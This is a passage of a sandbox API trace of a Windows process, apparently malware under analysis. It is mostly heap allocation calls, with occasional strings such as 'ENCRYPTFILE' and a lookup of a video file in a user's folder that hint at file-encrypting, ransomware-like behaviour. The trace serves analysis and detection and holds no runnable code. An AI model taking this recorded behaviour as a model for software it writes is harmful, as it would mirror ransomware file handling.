lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0101.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x160) returned 0x43cc1c8 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0101.553] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0101.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0101.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0101.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0101.553] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0101.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0101.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0101.553] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\h8KMQ6UP_q4ir-v.mp4", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecd3cc0, ftCreationTime.dwHighDateTime=0x1d5e0e8, ftLastAccessTime.dwLowDateTime=0x2e368a50, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0x2e368a50, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x15742, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="h8KMQ6UP_q4ir-v.mp4", cAlternateFileName="H8KMQ6~1.MP4")) returned 0x41ac280 [0101.554] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0101.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0101.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0101.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0101.554] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0101.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0101.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0101.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0101.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca268 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0101.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0101.555] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0101.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0101.556] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0101.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0101.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2860 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0101.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2820 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0101.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0101.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0101.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0101.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0101.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0101.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0101.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0101.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0101.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0101.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0101.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0101.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0101.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0101.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.559] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0101.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0101.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0101.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0101.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0101.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0101.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0101.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0101.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0101.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0101.563] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0101.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0101.564] RtlAllocateHeap (HeapHandle=0x1780000, 